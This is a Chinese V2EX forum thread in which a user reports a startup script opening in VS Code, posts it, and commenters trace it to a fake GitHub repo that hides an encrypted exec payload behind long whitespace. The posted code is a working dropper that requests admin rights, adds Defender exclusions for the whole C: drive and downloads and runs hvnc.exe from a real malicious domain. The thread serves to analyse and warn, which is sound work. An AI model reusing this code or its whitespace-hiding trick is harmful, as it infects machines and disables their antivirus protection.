开机的时候自动用 vscode 打开了一段代码。ChatGPT 说是病毒？？

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

• 请不要在回答技术问题时复制粘贴 AI 生成的内容

这是一个创建于 354 天前的主题，其中的信息可能已经有所发展或是发生改变。

代码传网盘了，有没有大佬能看看怎么办😭 https://www.alipan.com/s/ysPCcqoe5TT

第一个文件名是 hvnc.py

import os
import subprocess
script = """
import os

def create_and_run_bat_script():
    bat_script_content = '''
@echo off
set "filePath=%appdata%\Microsoft\emptyfile20947.txt"
:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
)

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params= %*
    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:--------------------------------------    

mkdir "C:\Windows\WinEmptyfold"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"

set "temp_file=%TEMP%\hahabonk.exe"

powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://bananasquad.ru/hvnc.exe', '%temp_file%')"

start "" "%temp_file%"
del /q "%appdata%\Microsoft\runpython.py"
'''

    temp_folder = os.environ.get('TEMP', '')
    if temp_folder:
        bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
        with open(bat_script_path, 'w') as bat_file:
            bat_file.write(bat_script_content)
        os.system(bat_script_path)
    else:
        print("Failed to get the TEMP folder path.")

if os.name == 'nt':
    folder_path = r"C:\Windows\WinEmptyfold"
    if os.path.exists(folder_path):
        exit()
    else:
        os.system('timeout 600')
        os.system('taskkill /f /im explorer.exe')
        create_and_run_bat_script()
        while True:
            os.system('timeout 5')
            if os.path.exists(folder_path):
                os.system('start explorer.exe')
                break
            else:
                create_and_run_bat_script()
"""

appdata = os.environ.get('APPDATA', '')
if appdata:
    # create microsoft folder if it doesn't exist
    microsoft_folder = os.path.join(appdata, 'Microsoft')
    if not os.path.exists(microsoft_folder):
        os.mkdir(microsoft_folder)
    script_path = os.path.join(appdata, 'Microsoft', 'runpython.py')
    with open(script_path, 'w') as script_file:
        script_file.write(script)
subprocess.Popen(['python', script_path], creationflags=subprocess.CREATE_NO_WINDOW)

第 1 条附言 · 354 天前

喜大普奔，恶意 repo 已经 404 了

62 条回复 • 2024-02-29 17:11:33 +08:00

Jimmyisme

354 天前

目前发现是在自启动中，但是我设置了 py 文件用 vscode 。可能就没有运行。
![](

)

Jimmyisme

354 天前

删除文件再 ctrl+z 撤回删除操作就被火绒拦截了。不是很懂为什么之前没有被发现。目前来看应该没什么大碍

![](

)

WoneFrank

354 天前

一看就病毒啊，有突破 UAC ，还去这拉了个 exe： https://bananasquad.ru/hvnc.exe 。
可以看 virustotal： https://www.virustotal.com/gui/domain/bananasquad.ru/relations

AoEiuV020JP

354 天前

有点搞笑了，投 python 病毒也不管电脑上有没有 python 环境，直接默认编辑器打开了，

Jimmyisme

354 天前

另一一个代码文件是(fernet)[https://github.com/oz123/python-fernet]加密的，
https://imgur.com/AAYVOQn
解密后是这样的
https://imgur.com/Z0h00ad

Kaggle notebook: https://www.kaggle.com/code/jimmyisme1/virus-check/notebook?scriptVersionId=164624730

Jimmyisme

354 天前

@WoneFrank 感谢，这方面的内容没有了解过，我看看有没有这个病毒的分析

Jimmyisme

354 天前

@AoEiuV020JP 幸好我默认设置.py 是用 vscode 打开。我发现我默认的 python 环境确实装了他这个脚本要运行的 fernet 库。😱

Jimmyisme

354 天前

@Jimmyisme #5
这段代码劫持了剪贴板，然后这是我昨天遇到的问题。估计以及中招了

![](

)

Jimmyisme

354 天前

我知道是哪里来的了，真 nm 脑残啊
https://github.com/maqrtineLzjulyie/spotify-check-premium/blob/main/main.py

第一行的最后面。还有 nm 一段代码。艹了
之前刷到在舍友的 for 循环后面偷偷加分号，乐子人终成乐子。妈的

MidGap

354 天前

@Jimmyisme #9 6666666666666666666666666

dier

354 天前

@Jimmyisme #9 这思路也是牛 B 。我点进去看了几眼都没看到问题，无意发现有水平滚动条，还那么长。。。

M2K4

354 天前 via Android

吓得我赶紧把自动折行打开

chackchackGO

354 天前

@Jimmyisme 为什么这个仓库有 4.5k 的 fork? 我没看明白

morgan1freeman

354 天前

@Jimmyisme #9 开源也不是完全安全，还是得审核代码，问题太多了

HFX3389

354 天前

@Jimmyisme #8 说不定是比特币地址:D

wkla

354 天前

@Jimmyisme #9 Github 上老多这种装成盗版的病毒了。😂

nekomiao

354 天前

@chackchackGO fork 和 star 差这么多，明显是刷的

inhzus

354 天前

速速打开 toggle word wrap

Link99

354 天前

牛逼这干嘛用的啊 Fork 4.5k Star 6 ?

Jimmyisme

354 天前 via Android

@chackchackGO #13 到处害人

ghjh

354 天前 via Android

@Jimmyisme 好家伙，我还寻思呢，咋手机 github 打开就一行 import os

shinession

354 天前

学到了一招, 还能这么玩的

flyqie

354 天前 via Android

感谢分享，涨知识了，已向 github 举报

xixixicat

354 天前

@Jimmyisme 不是，这思路也太牛逼了吧

wangkun025

354 天前

已经举报给 GitHub 了。

Les1ie

354 天前

恶意代码部分：
```
import os ;os.system('pip install cryptography');os.system('pip install fernet');os.system('pip install requests');from fernet import Fernet;import requests;exec(Fernet(b'yKpskffUwlXAGQtWJiXILDemLKDod4v8DpfKK3ClcHo=').decrypt(b'gAAAAABlv3l_ShNj4Sta_rsNaa9OI2cs0EyIBDdLPw6x4VVSxY9AYPGhGcOClTKrp_TBol_GE50_2GWBH3IfwUsOTJpM5PvjUgD939S4E75PGnNWs_qq9kk1mbhzcEuOumsWSm28OPbC6vs4CjgTliTihSbRedGIUvizU9JdEpFIQfkFU6sbmpBFR9kzI8ttiIoFqxLvEriZ6tvIumAuq_s-A65rXKflng=='))
import requests
import json
```
利用超长的空格欺骗没有开启自动换行的编辑器，的确是未设想的添加后门的方式。这个方法究极简单却有用，稍有不慎我也可能中招了。